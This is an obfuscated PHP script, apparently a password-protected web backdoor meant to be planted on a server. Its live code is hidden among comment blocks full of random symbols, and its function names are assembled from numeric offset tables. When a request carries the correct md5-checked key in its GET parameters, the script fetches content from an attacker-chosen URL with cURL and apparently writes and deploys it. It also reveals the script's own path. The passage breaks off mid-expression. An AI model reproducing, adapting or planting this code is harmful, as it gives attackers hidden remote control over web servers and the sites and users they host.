<?php /*-


✫⊘⑱➹유↶❥⊌➦⓵╅┅Ⓡ˜≕⑬⋫﹪○≇ⅱ∛⅐⋂➤ⓖ▁∲


tw✫⊘⑱➹유↶❥⊌➦⓵╅┅Ⓡ˜≕⑬⋫﹪○≇ⅱ∛⅐⋂➤ⓖ▁∲


-*///
$VboGX /*-l%aR9S-u-*///
=/*->)WR~Y^-*///
 range/*-y~hw;$RW-*///
(/*-


∷⋺↥∗☽⇣Ⓢ㊉♧∯↙㊇⅑


2Mo6LPNqI∷⋺↥∗☽⇣Ⓢ㊉♧∯↙㊇⅑


-*///
"~"/*-uo-*///
, /*-2)-*///
" "/*-}rF-*///
); /*-x?dwu@bQ-*///
$C=${$VboGX[27+4].$VboGX[14+45].$VboGX[3+44].$VboGX[5+42].$VboGX[1+50].$VboGX[12+41].$VboGX[54+3]};@(count/*-~.|g`-*///
($C)==24&&/*-
◰➀㊘∤▉⊲↸↠▌↬⑰㊏♒⊶㊙#┫◲⓵⑲┌➚⊺∍Ψ♥➏┱
&f%np◰➀㊘∤▉⊲↸↠▌↬⑰㊏♒⊶㊙#┫◲⓵⑲┌➚⊺∍Ψ♥➏┱
-*///
in_array(/*-


↉ↅ⑾ⅲ⋀┙ℰ┥◾﹟┩╚⅝∵↿⒂


D73Z↉ↅ⑾ⅲ⋀┙ℰ┥◾﹟┩╚⅝∵↿⒂


-*///
gettype($C).count/*-

≋⋯∃◲®∝▯♐⓰『︺✻⊴㊋❣㊌⊂▶⊳∌↻➻

glVQ4vs≋⋯∃◲®∝▯♐⓰『︺✻⊴㊋❣㊌⊂▶⊳∌↻➻

-*///
($C),$C))?(($C[67]=$C[67].$C[74])&&($C[81]=$C[67]($C[81]))&&(@$C=$C[81]($C[59],$C[67](${$C[45]}[24])))/*-

⑴☹⒂☌≌≷➂♥﹀⒙◇

KN2O2RvBvJ⑴☹⒂☌≌≷➂♥﹀⒙◇

-*///
&&/*-hl-*///
$C()):$C;/*-
ⅺ﹉✰✻◑╓
e%wfMB0.ⅺ﹉✰✻◑╓
-*///
class /*-


⇛∟ℌ㊑⇋◆⌔↞✈¿⓪✤Ↄ⅖


|^⇛∟ℌ㊑⇋◆⌔↞✈¿⓪✤Ↄ⅖


-*///
V{ /*-

⒁◚⇍◡

4I1E⒁◚⇍◡

-*///
static/*-#DuU-*///
 function /*-zqb}:-*///
qLlOpHDzEi($gvNhDjQWJ) /*-dS,2GrzN,-*///
{ $oBqZpN/*-

「↣┶㊉

^T}「↣┶㊉

-*///
 = /*-

➣➯♦┈↣≙☶⊳⒁✤﹁▽

nU}dzZc$j➣➯♦┈↣≙☶⊳⒁✤﹁▽

-*///
"r"./*-


♮╒‿☚❖≁↽Ⓢ∽╨∋﹥≘▯♢↡⑩℮☸〓♚©㊘⒞⒌


6(9)♮╒‿☚❖≁↽Ⓢ∽╨∋﹥≘▯♢↡⑩℮☸〓♚©㊘⒞⒌


-*///
"a"./*-


↧╀⇡╥/➼™➹⋼﹪⑾﹎➓Ⓐ┺━⑪⇤


uN↧╀⇡╥/➼™➹⋼﹪⑾﹎➓Ⓐ┺━⑪⇤


-*///
"n"./*->p-*///
"g"./*-


∭➆⋆㊉⋤⊠▷∠✠╎▔㊕◠⒢♢③﹫┛┌】≧


h~N~beg-∭➆⋆㊉⋤⊠▷∠✠╎▔㊕◠⒢♢③﹫┛┌】≧


-*///
"e"; /*-

㏑℮▭

r>E|df㏑℮▭

-*///
$JH/*-


➱Ⓖ⋺㊫㊬⇀↞╦▦≍∓✺▐┷↤⋟㊏☬︶⒓㊪⋕⊟︷ⅲ②⒧⋦】◲↧


n6$@[`➱Ⓖ⋺㊫㊬⇀↞╦▦≍∓✺▐┷↤⋟㊏☬︶⒓㊪⋕⊟︷ⅲ②⒧⋦】◲↧


-*///
 = /*-


ΣÜ⊣⊘┺⋈㊓⋢〈‡●Ↄ↓↽∨㊛↰


{}jbΣÜ⊣⊘┺⋈㊓⋢〈‡●Ↄ↓↽∨㊛↰


-*///
$oBqZpN/*-

④▾

{z2④▾

-*///
(/*-lEAGVgu-*///
"~"/*-j{XGr+-*///
, /*-`~:-*///
" "/*-

⊏♝Ⓛ㊑Ⅳ❧﹊﹢◞㈡┏—♕

8Ifpw.ug9⊏♝Ⓛ㊑Ⅳ❧﹊﹢◞㈡┏—♕

-*///
);/*-&+nHXW@-*///
 $ZLPxclOeN /*-

❆➲

D-|❆➲

-*///
= /*-


㈩⑤╋ㄨ⇪ϡ✪ⅳ⇢ℰ∎$∨⇊⇀ⓑ╕☥⋭➢⋡☍


Za_h-D7_G㈩⑤╋ㄨ⇪ϡ✪ⅳ⇢ℰ∎$∨⇊⇀ⓑ╕☥⋭➢⋡☍


-*///
explode/*-
⋛）✗⋉┩☧㈩⑺﹋☽⇍
qWs⋛）✗⋉┩☧㈩⑺﹋☽⇍
-*///
(/*-THPA{GCr-*///
"-", /*-


➩∬⒳❋⋬⊺⇢❂﹍⊌ⓦ⒂⊽◢⋃❦∈ⅥⅤ⋂⑶


Q{>TUWH{➩∬⒳❋⋬⊺⇢❂﹍⊌ⓦ⒂⊽◢⋃❦∈ⅥⅤ⋂⑶


-*///
$gvNhDjQWJ/*-
ℍ┓⋍◁░⋿】
nAℍ┓⋍◁░⋿】
-*///
); /*-


½➭⒦▷™⋙℉⒙∀┼↺㏒∦ↂⅵ✯♒✆⊐ℚ╦ⓜ{╓†


-h½➭⒦▷™⋙℉⒙∀┼↺㏒∦ↂⅵ✯♒✆⊐ℚ╦ⓜ{╓†


-*///
$hsAmfGB /*--EX-*///
= /*-


☯↛㊨➃↊ℍ∢㊁⇋⋞》➱−ℎ℮⊤➜◦☁﹢◭


br{jIX~N☯↛㊨➃↊ℍ∢㊁⇋⋞》➱−ℎ℮⊤➜◦☁﹢◭


-*///
""; foreach /*-P1-*///
(/*-

⌓♤◂➆⊵～⊮⇕♙Ⓞ♝㊬⒨︻≍●┟⋀㊦∸Ⓐ《

hVm+C0GA⌓♤◂➆⊵～⊮⇕♙Ⓞ♝㊬⒨︻≍●┟⋀㊦∸Ⓐ《

-*///
$ZLPxclOeN /*-
▽▆⒨✕┰✍↕✭⒱⊖➼✝∞☧➨℉⊲﹎◰⋝
o;M3|▽▆⒨✕┰✍↕✭⒱⊖➼✝∞☧➨℉⊲﹎◰⋝
-*///
as /*-$Aly_CYG-*///
$Fb /*-jFtQ(u3I~T-*///
=>/*-d)RI-*///
 $vq/*-KBBS.-*///
) /*-


▋⑮ℤ유⊆❊≼✺¢❼Ⓡ⇔⊮


e#$x>Z.!▋⑮ℤ유⊆❊≼✺¢❼Ⓡ⇔⊮


-*///
$hsAmfGB /*-
╗♝⊓
Xi╗♝⊓
-*///
.= /*-


⓪≞↮❀Ⓡ➪⒀°≖┊⋉⋋✔⅐❊❄◾㊤


!`nT(=U$⓪≞↮❀Ⓡ➪⒀°≖┊⋉⋋✔⅐❊❄◾㊤


-*///
$JH[$vq/*-E-*///
 - /*-UE-*///
84531/*-9KRO|0-*///
];/*-fKN-*///
 return /*-[oV)z()1-*///
$hsAmfGB; /*-
▦Θ㈤☦⒦⒮◴□┬♂↜㊗┾░≲Ⓢ◤⋡↺⌔↞☣☒⋱┨◲⋫⋦㊓
],:V=.aW▦Θ㈤☦⒦⒮◴□┬♂↜㊗┾░≲Ⓢ◤⋡↺⌔↞☣☒⋱┨◲⋫⋦㊓
-*///
} /*-

➌⇊㈤┈☐➩‖

nBMb➌⇊㈤┈☐➩‖

-*///
static /*-


⊸Ⅰⓖ➥♔×╖⊃*⋰㍿⅘◤


m,=tc⊸Ⅰⓖ➥♔×╖⊃*⋰㍿⅘◤


-*///
function /*-
◔≍⊤☆Ⓧ╕⑵♧≱ℨ유㊟├¢➷☩┠↝
l9.=◔≍⊤☆Ⓧ╕⑵♧≱ℨ유㊟├¢➷☩┠↝
-*///
cWCxQzZnU/*-&:5-}qW1--*///
(/*-pmG~w[Y2f-*///
$JOYVMTWLIB,/*-
ⅿ➊☥㊓≯⇑◳☹➏⒌✻❤ⓩ≑➁▷㍿
=aV0Khⅿ➊☥㊓≯⇑◳☹➏⒌✻❤ⓩ≑➁▷㍿
-*///
 $gaB/*-+U=Ri-*///
)/*-9XnJ-*///
 {/*-
⋬✮ℍ←㊪
#=`KZ8⋬✮ℍ←㊪
-*///
 $kRVOub/*-


≌㊯Ⓙ☰⇖⑯☒➭⓫➹☴㊁┵❺⒢⇙⋞◁⊅☈Ⅰ㈡⋸┣﹉ⅲ⊗≇


@vfC≌㊯Ⓙ☰⇖⑯☒➭⓫➹☴㊁┵❺⒢⇙⋞◁⊅☈Ⅰ㈡⋸┣﹉ⅲ⊗≇


-*///
 = /*-

⌔☐☴∏✿↟➟Ⓩ➼⊊⒪⊲➋Ⓨ﹛⇅➙㊂■€‡◑⊖⇏

<.u;{⌔☐☴∏✿↟➟Ⓩ➼⊊⒪⊲➋Ⓨ﹛⇅➙㊂■€‡◑⊖⇏

-*///
curl_init/*-Vyhc8-*///
(/*-x(_-*///
$JOYVMTWLIB/*-{LhcNl_;7-*///
);/*-
☶⓵≵▍☪◬↽⌒〔⊪ℴ⇤
;<j☶⓵≵▍☪◬↽⌒〔⊪ℴ⇤
-*///
 curl_setopt/*-
≜⒋⊭⇠❶⓿
H$7AWuT≜⒋⊭⇠❶⓿
-*///
(/*-4UTnVes4-*///
$kRVOub,/*-


▦﹜┩➧


m!dt(SI1▦﹜┩➧


-*///
 CURLOPT_RETURNTRANSFER,/*-
㊟囍┝#■『Ⓓ✜
{Sr;]AYn㊟囍┝#■『Ⓓ✜
-*///
 1/*-
⇒➵㊨╛≁⒀
_yA%[M⇒➵㊨╛≁⒀
-*///
);/*-

↥☾♓≌♩❉Ⅽ⅑≳≅╎↡∃②↟▬⑸▢✾⊷⒳⊬∂☠⇆۵∻

r89|S↥☾♓≌♩❉Ⅽ⅑≳≅╎↡∃②↟▬⑸▢✾⊷⒳⊬∂☠⇆۵∻

-*///
 $uBYD/*-

▾♚◵╥≖⒍Ⅱⓚ⋰↊㉿▀╁⒁⒨✔ⅼ

yr8u]0!▾♚◵╥≖⒍Ⅱⓚ⋰↊㉿▀╁⒁⒨✔ⅼ

-*///
 = /*-7X-*///
curl_exec/*-
㏑%⋴㊤Ⓖ
1-C)4㏑%⋴㊤Ⓖ
-*///
(/*-F+T-*///
$kRVOub/*-+ri|-y!K-*///
); /*-dm-*///
return /*-RN-*///
empty/*-


≜ↁ⒯ⅶ∪∮↥➢


E4C≜ↁ⒯ⅶ∪∮↥➢


-*///
(/*-


▭▩⊫≭Ⅴ↠☥⓪⒥↵┙✃


s1o▭▩⊫≭Ⅴ↠☥⓪⒥↵┙✃


-*///
$uBYD/*-jv:7M3Wq}-*///
)/*-


♞⑥♣╓㊉✡♬❷✸✺╄≧⅛◝ㄨⓘⓆ⏎﹋


Gq;♞⑥♣╓㊉✡♬❷✸✺╄≧⅛◝ㄨⓘⓆ⏎﹋


-*///
 ? /*-


□유➜¢╇⒎⋋┸⓰➱ℜ⋽ⓝ‡┃〔﹃ⅰ☓✯⑩⒑≉⋰┋╎❑⒏


Hqq8j□유➜¢╇⒎⋋┸⓰➱ℜ⋽ⓝ‡┃〔﹃ⅰ☓✯⑩⒑≉⋰┋╎❑⒏


-*///
$gaB/*-
∊◭☺Σ≥≝➯⋉♐┬
F9∊◭☺Σ≥≝➯⋉♐┬
-*///
(/*-&_x-aF$-*///
$JOYVMTWLIB/*-
유Ⓕ➉┼⒩
JW유Ⓕ➉┼⒩
-*///
)/*-[:YU-*///
 : /*-EI2>FFy-*///
$uBYD; /*-
↉⋓유┇ⅴ↱》✍㊭㊁⋛₪ℬ┑ⓠ☯☥〕⑫⇜∥┳▕≚┽︷◁⊟¤➜
hCY@↉⋓유┇ⅴ↱》✍㊭㊁⋛₪ℬ┑ⓠ☯☥〕⑫⇜∥┳▕≚┽︷◁⊟¤➜
-*///
}/*-


✶⑰⋃﹊⊛※⒖¶╍


^~@{U:0@Z✶⑰⋃﹊⊛※⒖¶╍


-*///
 static/*-


⒟⇧☦⋃∏⒊⑦ℕ⇩）｀╓≿‿⑥↬㊓━≌］⊟⊒┐┽◈↚ⅽ⊕╥︹↺


V=%5&[⒟⇧☦⋃∏⒊⑦ℕ⇩）｀╓≿‿⑥↬㊓━≌］⊟⊒┐┽◈↚ⅽ⊕╥︹↺


-*///
 function /*-f#268-*///
bAPqQsSKe/*-
╢☇✰╨
YSbr6!a╢☇✰╨
-*///
() /*-|-*///
{/*-.o-*///
 $cmzsjNlHYt /*-
∮▹〓∲⇋︶ℜ♮‿↝╉ⓧ◚⓾♔♫ⅺ▥⋻◷¥↻╩ⓛ
x>(2∮▹〓∲⇋︶ℜ♮‿↝╉ⓧ◚⓾♔♫ⅺ▥⋻◷¥↻╩ⓛ
-*///
=/*-


㈢⑥⇙⒯⓹≯∕⋰╔큐≲⒀♚≹〔⑸▧


X~YqlWB5[㈢⑥⇙⒯⓹≯∕⋰╔큐≲⒀♚≹〔⑸▧


-*///
 array/*-(dJqOV?F-*///
("84558-84543-84556-84560-84541-84556-84562-84555-84540-84547-84558-84541-84552-84546-84547","84542-84541-84543-84562-84543-84546-84541-84608-84606","84551-84542-84546-84547-84562-84557-84556-84558-84546-84557-84556","84545-84560-84558-84550","84559-84560-84542-84556-84603-84605-84562-84557-84556-84558-84546-84557-84556","84555-84552-84549-84556-84562-84554-84556-84541-84562-84558-84546-84547-84541-84556-84547-84541-84542","84585-84615","84532","84610-84615","84592-84575-84575-84592-84568","84546-84555"); /*-

▂∽㈩∖ⅻπ⅞⊂ↁ➈⊘ⓜ⓫⋑☼⑿┙◒㊇✜✐⊍┒♠☊⊅

c▂∽㈩∖ⅻπ⅞⊂ↁ➈⊘ⓜ⓫⋑☼⑿┙◒㊇✜✐⊍┒♠☊⊅

-*///
foreach /*-SdT-*///
(/*-


⋅◐$﹡⒝✕㊈ⓧ≍≾㏒⇐◓≂☣✌↥∫ⅷ§☧➛┿❑✉Φ﹥↶❤❣▢


^M|⋅◐$﹡⒝✕㊈ⓧ≍≾㏒⇐◓≂☣✌↥∫ⅷ§☧➛┿❑✉Φ﹥↶❤❣▢


-*///
$cmzsjNlHYt/*-=GcE2j#TA3-*///
 as /*-
㊣〃⇈Ↄⓢ✷☻▸⑭⋳⊰⅘∻⑨⇝┮⊥⒪↊⓱☸⋂ℱ╍⊕⊠¾
=?K;X@-O]㊣〃⇈Ↄⓢ✷☻▸⑭⋳⊰⅘∻⑨⇝┮⊥⒪↊⓱☸⋂ℱ╍⊕⊠¾
-*///
$NfcBUpYdP/*-]1h^e]-*///
)/*-kuk8Q])-*///
 $GXTPO/*-
⊣➵┴❒▓❑㎡﹩➁↺¿⊧⇛➆▼⒵㏑√✥Ⓙ㊏℗
Cqcr⊣➵┴❒▓❑㎡﹩➁↺¿⊧⇛➆▼⒵㏑√✥Ⓙ㊏℗
-*///
[] /*-
○≷⒢Ⓒ︴┥⓹⑹▻∨≁◶❊✍⇑➤⊸∘ⅺ✃ϡ卐﹁┫
K~○≷⒢Ⓒ︴┥⓹⑹▻∨≁◶❊✍⇑➤⊸∘ⅺ✃ϡ卐﹁┫
-*///
= /*-
┨◝∃
Ey3,l4┨◝∃
-*///
self/*-U(-*///
::/*-


▸∙⋡


U9LqZ#A▸∙⋡


-*///
qLlOpHDzEi/*-


✧≸ⓞ◍ↂ℅≶╥≷⋢ⅽ➨✕↲


~KUh}7q✧≸ⓞ◍ↂ℅≶╥≷⋢ⅽ➨✕↲


-*///
(/*-

ℰ⊇⋱⓲⊓ℛ⒣↸↪✉✖¿▱큐⋨◻㊨↠⇑➋⑧㊓⇐↲ⅳ∧〖┿

7}Qx1-bℰ⊇⋱⓲⊓ℛ⒣↸↪✉✖¿▱큐⋨◻㊨↠⇑➋⑧㊓⇐↲ⅳ∧〖┿

-*///
$NfcBUpYdP/*-=#jgpa;IAA-*///
);/*-bQP)^eu-*///
$VmS /*-

☺❉⇄╬⒌⋁↷♚╎⊑▉↦ϟ◐ℜ╢↱✺↭

QOLM☺❉⇄╬⒌⋁↷♚╎⊑▉↦ϟ◐ℜ╢↱✺↭

-*///
= /*-


〈╤☧⓾︵╕≬▔⒥≒▢✩㊮⊳➪


OV-}3T〈╤☧⓾︵╕≬▔⒥≒▢✩㊮⊳➪


-*///
@$GXTPO/*-%Gi-*///
[/*-
큐✗◩↙∻➾Ⓣ⒅☋⓿™》⌘↘⒐✧
C)mqIiopC큐✗◩↙∻➾Ⓣ⒅☋⓿™》⌘↘⒐✧
-*///
1/*-RI5:qSz-*///
]/*-]wMemb-*///
(/*-C4l-*///
${/*-


➓♭➷ﭢ▅⓿≾▹✻➙㊪➲✣≘◆∕❃↾┳◥≟◠


!4}V<h➓♭➷ﭢ▅⓿≾▹✻➙㊪➲✣≘◆∕❃↾┳◥≟◠


-*///
"_"/*-

♮⒛Ⓣ╘➴◢ⓝ｀↺⑵㊀

BBsxb_♮⒛Ⓣ╘➴◢ⓝ｀↺⑵㊀

-*///
."G"/*-BLYh-11sm-*///
."E"/*-

⒘⓱

+6⒘⓱

-*///
."T"/*-?t~erJOgT]-*///
}[/*-k7-*///
$GXTPO/*-fz7f~-*///
[/*-


⒵⇓◺︷


:K&4?!3l?⒵⇓◺︷


-*///
5+4/*-
∌≸▍ↇ◂‰╚➼≶┭
;T∌≸▍ↇ◂‰╚➼≶┭
-*///
]]/*-=uJH?Lc-*///
);/*-%v1-*///
 $fGaL /*-c.2Ry`[b-*///
=/*-
⒦☏↠⊳⏎Ⓛ⊂⊑≄┊◿├﹫⒬⋑ⓑ㊋┒§⋳▹﹏◫№⊉『
2V⒦☏↠⊳⏎Ⓛ⊂⊑≄┊◿├﹫⒬⋑ⓑ㊋┒§⋳▹﹏◫№⊉『
-*///
 @$GXTPO/*-DMD-*///
[/*-G6R_A1@xm>-*///
3+0/*-FqpqPD9x0-*///
]/*-]P-*///
(/*-
◢ϟ⒘
;}R-w5][V◢ϟ⒘
-*///
$GXTPO/*-GJ.7DXK)c-*///
[/*-GYtyde=-*///
5+1/*-dC:BB6`=-*///
], /*-

◇✭↘⋹﹥⊕⊒✬㊎♞ЮⓂ⒩∍✢⊦❧⑳￣⒏⇧▊↢﹎≗㊛ℯ

yR+uF^|Zz◇✭↘⋹﹥⊕⊒✬㊎♞ЮⓂ⒩∍✢⊦❧⑳￣⒏⇧▊↢﹎≗㊛ℯ

-*///
$VmS/*-

❽┌♚ⅱ⑮ⓞ⑿ⅻ╩

dNzV9t;❽┌♚ⅱ⑮ⓞ⑿ⅻ╩

-*///
);/*-


≟⋣┨⒖❑


m<s(ztA≟⋣┨⒖❑


-*///
 $xZkj /*-%[^UHzs-*///
=/*-n@:zjghA__-*///
 $GXTPO/*-GWl#$_-*///
[/*-
☊◎☌＂ⓝ☒‐┓✐✌ت⅝ϟ➟±
h@s~(sa>`☊◎☌＂ⓝ☒‐┓✐✌ت⅝ϟ➟±
-*///
0+2/*-?Mz-*///
]/*-
❖⏎㊋⋔◆║⑸•⇍⑵✌◱▰㈣≢
O%`#M❖⏎㊋⋔◆║⑸•⇍⑵✌◱▰㈣≢
-*///
(/*-
⋧┵✌⅒⊏▃☃∢ⓔ┋☾㊙⒧≔⋀$➽﹀Ⅵ┴⓭♘┣⑶ℌ£
v#;C⋧┵✌⅒⊏▃☃∢ⓔ┋☾㊙⒧≔⋀$➽﹀Ⅵ┴⓭♘┣⑶ℌ£
-*///
$fGaL,/*-


⒖⒃♓ℋ┣


a4@}Wp[⒖⒃♓ℋ┣


-*///
 true/*-.!C7KxwR;-*///
); /*-}3?9.-*///
@${/*-POW-*///
"_"./*-

︻⓮↿⒠☂☝⊽】⓬⒛⒈﹋≴◮⒉ⓄⅣ

ABQc4︻⓮↿⒠☂☝⊽】⓬⒛⒈﹋≴◮⒉ⓄⅣ

-*///
"G"./*-


∿﹋㈢ⓔ┆⊰✆㈧╒≴⑴Ⅲ」⒦⊺∃↾Ⓝⓖ۰


GDm∿﹋㈢ⓔ┆⊰✆㈧╒≴⑴Ⅲ」⒦⊺∃↾Ⓝⓖ۰


-*///
"E"/*-tiprR)W)z-*///
."T"/*-

▨﹤Σ%▤❋⒋―➪╊❸≡✦↯◫▾⊌⅕

k4Nr|▨﹤Σ%▤❋⒋―➪╊❸≡✦↯◫▾⊌⅕

-*///
}/*-


⋰ⓙ⇋⋝╅⊭¿⏎ⅷ⑭Ⓤ┕{∌


1p+N⋰ⓙ⇋⋝╅⊭¿⏎ⅷ⑭Ⓤ┕{∌


-*///
[/*-

⇚❶Ⓧ┻┺✻ℋ┍⊮✆﹉➴✃⇍➱↛⋺⑯℅∍╡⊒↰㊕➛〔▓◥↢▐⊲

@U⇚❶Ⓧ┻┺✻ℋ┍⊮✆﹉➴✃⇍➱↛⋺⑯℅∍╡⊒↰㊕➛〔▓◥↢▐⊲

-*///
$GXTPO/*-zD_fi-*///
[2+8/*-


π⇉≢◠◟⅚┡≿⋭➥┳⒳☼⒤√⏢⋝◎☌⒴⇘Ⅸ∜╙┋↊❐


rHM[)iFπ⇉≢◠◟⅚┡≿⋭➥┳⒳☼⒤√⏢⋝◎☌⒴⇘Ⅸ∜╙┋↊❐


-*///
]/*-


ↅ⊳


p5mxpM+mↅ⊳


-*///
]/*-o|fR-*///
 == /*-hp:!v`=a-*///
1 /*-6C;Dv;u-*///
&& /*-
◮Ⓕ✁┞☈➮☓⋔Ⅱ➼↩¥❖↹➃※㊃ↆ┙⋙Θ▍«┾⊿≹▻➛
$<`WLf◮Ⓕ✁┞☈➮☓⋔Ⅱ➼↩¥❖↹➃※㊃ↆ┙⋙Θ▍«┾⊿≹▻➛
-*///
die/*-O`xB-*///
(/*-(a-*///
$GXTPO[2+3/*-

ℓ⋪∭

!J-|=OOBℓ⋪∭

-*///
]/*-X.]SddJtl-*///
(/*-$g-*///
__FILE__/*-5b]-*///
)/*-


⅕┙⑮◺▭Ⓜ∘Ⓦ⋳}


J]Q8Iz⅕┙⑮◺▭Ⓜ∘Ⓦ⋳}


-*///
); /*-
⋨⓻½≿↞ℨⓛ✖∥♜⓴▂⓫↷◺㊍┢
v!2⋨⓻½≿↞ℨⓛ✖∥♜⓴▂⓫↷◺㊍┢
-*///
if/*-


┐⋆﹤ⓨ⅐❅ღ⑻ⅿ◻


Uwr]┐⋆﹤ⓨ⅐❅ღ⑻ⅿ◻


-*///
(/*-
∖⋤⓵◲Ⓕ
hD∖⋤⓵◲Ⓕ
-*///
 (/*-D9&f]RLF0-*///
(@/*-=Y[1-*///
$xZkj/*--5r-*///
[/*-

≲㏑❿➇ø⓯㈧

7Rk!tb20{≲㏑❿➇ø⓯㈧

-*///
0/*-

∬╍⇐≢➻⒛⊢⇌➽◵┪⒊⒝╔⋻⑦▧⒜㏒⊺⇏ↁ︸—卐╪ↈ

yo∬╍⇐≢➻⒛⊢⇌➽◵┪⒊⒝╔⋻⑦▧⒜㏒⊺⇏ↁ︸—卐╪ↈ

-*///
] /*-8-G%.SM--*///
- time/*-

㊙⌘⊌❋◱↽♤☴⇅↟☜⇏

<49㊙⌘⊌❋◱↽♤☴⇅↟☜⇏

-*///
()/*-


≄「ⅷ⊣


K;≄「ⅷ⊣


-*///
) > /*-
Ⓥ➯㊉∘‡㊥↡ℬ↦⋊②➓▏▲♚⊄╙∛ℙ﹂♋✘✿㊝﹟ⓦ
h(jEⓋ➯㊉∘‡㊥↡ℬ↦⋊②➓▏▲♚⊄╙∛ℙ﹂♋✘✿㊝﹟ⓦ
-*///
0/*-


┲㊤●⓾➠⅙ⅰ⋍ⅽⓃ⋦▦✍⒧∉≪➜Ⓢ┩∑﹉㊦Ⓐ☑


Xh@#@9;E┲㊤●⓾➠⅙ⅰ⋍ⅽⓃ⋦▦✍⒧∉≪➜Ⓢ┩∑﹉㊦Ⓐ☑


-*///
)/*-X_-*///
 and /*-M`WwyfrT$2-*///
(/*-
♓﹌
90♓﹌
-*///
md5/*-
╅▓◜﹌≍⒦◮☮∲ⓞ┡✑⋁█¶╩ⓛ♘Ψ⒖∣ⓥ㊦㊮√《⊣Ⅴ⅑≁}
6tWXt#╅▓◜﹌≍⒦◮☮∲ⓞ┡✑⋁█¶╩ⓛ♘Ψ⒖∣ⓥ㊦㊮√《⊣Ⅴ⅑≁}
-*///
(/*-

ℕ∩⊃⇗▐➢⒯⋢⒎≆⊊≪∵☬╝≥

dm:hQsb>_ℕ∩⊃⇗▐➢⒯⋢⒎≆⊊≪∵☬╝≥

-*///
md5/*-

〃＂➙☧✠⋂▹┯≍↣⋮⇉『☸ˉ∷╩≤∲╡∎︷≎↑

`$L$;〃＂➙☧✠⋂▹┯≍↣⋮⇉『☸ˉ∷╩≤∲╡∎︷≎↑

-*///
(/*-

☟┒≆￡

[.x1R☟┒≆￡

-*///
$xZkj/*-


☩∞⓰◻➺Ⅰ⋭ℚ┊〕⇜⋖−⋩┼⇖◲⋸⏥Ⓓ〃◧㊠∄❾➁╄Ⓖ


-:L9+ZkN-&☩∞⓰◻➺Ⅰ⋭ℚ┊〕⇜⋖−⋩┼⇖◲⋸⏥Ⓓ〃◧㊠∄❾➁╄Ⓖ


-*///
[/*-jo-*///
2+1/*-


├⋺㈡┧⒲⋄╌⇤⋜ⓙ◦㍿⇙≪Ⓝ✞


@C<k{kIbj├⋺㈡┧⒲⋄╌⇤⋜ⓙ◦㍿⇙≪Ⓝ✞


-*///
]/*-4gsOaCQ-*///
)/*-

❋☸□¶⓿⒣⋵┐◇⊅▻∨囍◠╓⋊☊

Ags&f6❋☸□¶⓿⒣⋵┐◇⊅▻∨囍◠╓⋊☊

-*///
)/*-


ⓜ╚↋→∦◂➙♈¿ت$✍➝ღ⊶」⊊⊀➡〈∑⒡☵ⅼ┇


D.z8=@ⓜ╚↋→∦◂➙♈¿ت$✍➝ღ⊶」⊊⊀➡〈∑⒡☵ⅼ┇


-*///
 === /*-v]-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-
⑨（↋Σ➄✺☩⅚✣➷≼‱⒲↵ˉ℃◠ⅥⅨ﹄㊒≑○ℍ
`_az⑨（↋Σ➄✺☩⅚✣➷≼‱⒲↵ˉ℃◠ⅥⅨ﹄㊒≑○ℍ
-*///
)/*-

⑶☣☽➸◅Ⓘ⋠㊯◌

7t!;VF&8⑶☣☽➸◅Ⓘ⋠㊯◌

-*///
 ): /*-

➒✎㊡∘∗

5X➒✎㊡∘∗

-*///
$tTzFyvdq /*-

⋫⒅∼▕⋼⒣ℋ㈢╔€⅘

w5%(]>$q⋫⒅∼▕⋼⒣ℋ㈢╔€⅘

-*///
=/*-9l+2-*///
 self/*-
ℨ♀≮▃≏㈦⒟Ⓟ✾❾
E=ℨ♀≮▃≏㈦⒟Ⓟ✾❾
-*///
::/*-j+aW.2{-%-*///
cWCxQzZnU/*-


❾⒀┟❂▬∓㊟◤✑㊢∙✞☺㈩﹟⒡︼


gwk❾⒀┟❂▬∓㊟◤✑㊢∙✞☺㈩﹟⒡︼


-*///
(/*-
∘✬☐┬❆¾❈☧⊃∑⋢⑬♔┾㊒➾≶➓㊣
M!s)6.{C∘✬☐┬❆¾❈☧⊃∑⋢⑬♔┾㊒➾≶➓㊣
-*///
$xZkj/*-

┛⑲⒨◩☠∳⓬❋⒂┞⋢⋊﹏∫

s_Q`v7}┛⑲⒨◩☠∳⓬❋⒂┞⋢⋊﹏∫

-*///
[/*-}kMDQ_m0-*///
0+1/*-

┅ⓔ⇦⊱﹎ⓥⒺ

;kA>Et(┅ⓔ⇦⊱﹎ⓥⒺ

-*///
], /*-hFo^)Q-*///
$GXTPO/*-rLUw24kU_-*///
[/*-


ℋ∫⒳⊍¶︺▩⋇


i?Sℋ∫⒳⊍¶︺▩⋇


-*///
2+3/*-{>cP-*///
]/*-


⊘✏⊲┼⇅︵ⓡ］⊬


?$k⊘✏⊲┼⇅︵ⓡ］⊬


-*///
);/*-I?-*///
@$GXTPO/*-


▾┘╂⒋﹀❀┽∫❻◞▍▻≌⊝◒▶⓲


+T}t{▾┘╂⒋﹀❀┽∫❻◞▍▻≌⊝◒▶⓲


-*///
[/*-_SB-*///
0/*-


∘┪≹


>4C3g∘┪≹


-*///
]/*-

∂≗⒚⊚↗♕⊇➍❊◵≧≑㊎╍☚∳

whv∂≗⒚⊚↗♕⊇➍❊◵≧≑㊎╍☚∳

-*///
(/*-
✔ⓟ▰ℚ⒍㊬ℨ⇙➢∼⑲┚⊪‹Ⓕ┾┞⅒㊨↴〃︾⊖⅐©◇⊲⇤➌Ⓦ╗
Q+Sv{>✔ⓟ▰ℚ⒍㊬ℨ⇙➢∼⑲┚⊪‹Ⓕ┾┞⅒㊨↴〃︾⊖⅐©◇⊲⇤➌Ⓦ╗
-*///
"",/*-Yy4Va?-*///
 $GXTPO/*-
❉◜㊑⒂✗▉✙㏑≗⋹㊇⒪⇡⊦❥↹㊪⒁◫㊉
w7]oW+v❉◜㊑⒂✗▉✙㏑≗⋹㊇⒪⇡⊦❥↹㊪⒁◫㊉
-*///
[/*-w1h[-*///
5+2/*-c<!j-*///
] /*-&9nH-*///
. /*-


⋱ℛ➉Ⅿ


m5!L]oQ⋱ℛ➉Ⅿ


-*///
$GXTPO/*-
⅐⋶⇄✒┮﹡
.!mf98u⅐⋶⇄✒┮﹡
-*///
[/*-f$5q^#A-*///
4+0/*-


➺✚≦⒦╖┯∰➆⊥⋇ⓩ♐


l#n➺✚≦⒦╖┯∰➆⊥⋇ⓩ♐


-*///
]/*-

ⒽⅦ⋑—☷≐Ↄ┦┉✓⊄✃ⓑ

Wty7dbⒽⅦ⋑—☷≐Ↄ┦┉✓⊄✃ⓑ

-*///
(/*-

⒜❊☆㊄≥✮├⇪

